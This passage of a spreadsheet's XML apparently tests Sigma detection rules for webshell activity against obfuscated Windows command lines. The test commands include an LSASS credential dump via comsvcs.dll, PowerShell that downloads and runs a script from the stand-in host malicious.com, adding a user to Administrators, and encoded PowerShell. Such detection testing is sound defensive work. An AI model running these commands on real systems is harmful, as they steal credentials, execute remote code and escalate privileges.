      <c r="K10" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="36" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B11" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C11" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D11" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E11" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp; ipconfig &amp; echo"</t>
        </is>
      </c>
      <c r="F11" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G11" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K11" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A12" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B12" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C12" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D12" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E12" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="43" t="n"/>
      <c r="J12" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K12" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" s="42">
      <c r="A13" s="43" t="n"/>
      <c r="B13" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C13" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D13" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E13" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\comsvcs.dll C:\Windows\Temp\c.dll &amp;&amp; rundll32.exe C:\Windows\Temp\c.dll, MiniDump 500 lsass.bin</t>
        </is>
      </c>
      <c r="F13" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G13" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H13" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I13" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J13" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K13" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" s="42">
      <c r="A14" s="43" t="n"/>
      <c r="B14" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C14" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D14" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E14" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F14" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G14" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H14" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I14" s="43" t="n"/>
      <c r="J14" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A15" s="43" t="n"/>
      <c r="B15" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C15" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D15" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E15" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F15" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G15" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H15" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I15" s="43" t="n"/>
      <c r="J15" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" s="42">
      <c r="A16" s="43" t="n"/>
      <c r="B16" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C16" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D16" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E16" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F16" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G16" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="43" t="n"/>
      <c r="J16" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" s="42">
      <c r="A17" s="43" t="n"/>
      <c r="B17" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C17" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D17" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E17" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F17" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G17" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H17" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="43" t="n"/>
      <c r="J17" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K17" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A18" s="43" t="n"/>
      <c r="B18" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C18" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D18" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E18" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMand "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="43" t="n"/>
      <c r="J18" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K18" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A19" s="43" t="n"/>
      <c r="B19" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C19" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D19" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E19" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F19" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G19" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I19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9" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" s="42">
      <c r="A20" s="43" t="n"/>
      <c r="B20" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C20" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D20" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E20" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoproFILe -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="43" t="n"/>
      <c r="J20" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K20" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="43" t="n"/>
      <c r="B21" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C21" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D21" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E21" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMaNd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F21" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G21" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H21" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I21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21" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="43" t="n"/>
      <c r="B22" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C22" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D22" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E22" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpRoFiLE -COmmAnD "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F22" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G22" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H22" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I22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22" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K22" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="43" t="n"/>
      <c r="B23" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C23" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D23" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E23" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -COMmAND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F23" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="43" t="n"/>
      <c r="J23" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K23" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="43" t="n"/>
      <c r="B24" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C24" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D24" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E24" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nopRoFIle -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F24" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G24" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I24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24" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K24" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="43" t="n"/>
      <c r="B25" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C25" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D25" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E25" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noprOFiLe -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F25" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G25" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H25" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I25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25" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K25" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="43" t="n"/>
      <c r="B26" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C26" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D26" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E26" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -coMmaND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="43" t="n"/>
      <c r="J26" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K26" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="43" t="n"/>
      <c r="B27" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C27" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D27" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E27" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F27" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G27" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I27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27" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K27" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="43" t="n"/>
      <c r="B28" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C28" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D28" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E28" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ec" JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F28" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G28" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="43" t="n"/>
      <c r="J28" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K28" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="43" t="n"/>
      <c r="B29" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C29" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D29" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E29" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eC JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F29" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G29" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I29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29" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="43" t="n"/>
      <c r="B30" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C30" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D30" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E30" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F30" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G30" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H30" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I30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30" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K30" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="43" t="n"/>
      <c r="B31" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C31" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D31" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E31" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="43" t="n"/>
      <c r="J31" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K31" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="43" t="n"/>
      <c r="B32" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C32" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D32" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E32" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F32" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G32" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I32" s="36" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J32" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K32" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="43" t="n"/>
      <c r="B33" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C33" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D33" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E33" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F33" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G33" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="36" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J33" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K33" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="43" t="n"/>
      <c r="B34" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C34" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D34" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E34" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F34" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G34" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K34" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="35" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="43" t="n"/>
      <c r="B35" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C35" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D35" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E35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35" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G35" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H35" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I35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35" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K35" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="43" t="n"/>
      <c r="B36" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C36" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D36" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E36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36" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G36" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="43" t="n"/>
      <c r="J36" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K36" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="43" t="n"/>
      <c r="B37" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C37" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D37" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E37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37" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G37" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="43" t="n"/>
      <c r="J37" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K37" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="43" t="n"/>
      <c r="B38" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C38" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D38" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E38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38" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="43" t="n"/>
      <c r="J38" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K38" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="43" t="n"/>
      <c r="B39" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C39" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D39" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E39" s="36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39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="43" t="n"/>
      <c r="B40" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C40" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D40" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E40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40" s="36" t="b">
        <v>1</v>
      </c>
